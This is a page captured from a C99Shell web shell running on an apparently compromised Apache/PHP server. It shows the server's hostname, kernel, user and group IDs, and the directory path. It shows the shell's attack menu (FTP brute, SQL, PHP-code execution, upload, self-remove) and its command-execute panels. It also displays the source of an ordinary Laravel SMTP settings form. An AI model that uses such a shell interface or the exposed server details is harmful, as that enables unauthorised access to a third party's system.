!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/gateway.picotech.app/public_html/resources/views/admin/settings/   drwxr-xr-x
Free 28.46 GB of 117.98 GB (24.12%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     smtp_form.blade.php (2.58 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<div class="row">
    <div class="col-sm-6">
        <div class="form-group">
            <label for="host">@lang('admin.form.mail_name')</label>
            <input value="{{get_settings('mail_name')}}" type="text" name="name" class="form-control" id="name"
                   placeholder="@lang('admin.form.mail_name')">
        </div>
    </div>
    <div class="col-sm-6">

        <div class="form-group">
            <label for="host">@lang('admin.form.mail_from')</label>
            <input value="{{get_settings('mail_from')}}" type="email" name="from" class="form-control" id="from"
                   placeholder="@lang('admin.form.mail_from')">
        </div>
    </div>
    <div class="col-sm-6">

        <div class="form-group">
            <label for="host">@lang('admin.form.mail_host')</label>
            <input value="{{get_settings('mail_host')}}" type="text" name="host" class="form-control" id="host"
                   placeholder="@lang('admin.form.mail_host')">
        </div>
    </div>
    <div class="col-sm-6">
        <div class="form-group">
            <label for="host">@lang('admin.form.mail_port')</label>
            <input value="{{get_settings('mail_port')}}" type="number" name="port" class="form-control" id="port"
                   placeholder="@lang('admin.form.mail_port')">
        </div>
    </div>
    <div class="col-sm-6">
        <div class="form-group">
            <label for="host">@lang('admin.form.mail_username')</label>
            <input value="{{get_settings('mail_username')}}" type="text" name="username" class="form-control"
                   id="username"
                   placeholder="@lang('admin.form.mail_username')">
        </div>
    </div>
    <div class="col-sm-6">

        <div class="form-group">
            <label for="host">@lang('admin.form.mail_password')</label>
            <input value="{{get_settings('mail_password')}}" type="password" name="password" class="form-control"
                   id="password"
                   placeholder="@lang('admin.form.mail_password')">
        </div>
    </div>
    <div class="col-sm-12">

        <div class="form-group">
            <label for="encryption">@lang('admin.form.mail_encryption')</label>
            <select class="form-control" name="encryption" id="encryption">
                <option {{get_settings('mail_encryption')=='tls'?'selected':''}} value="tls">TLS</option>
                <option {{get_settings('mail_encryption')=='ssl'?'selected':''}} value="ssl">SSL</option>
            </select>
        </div>

    </div>
</div>







:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0061 ]--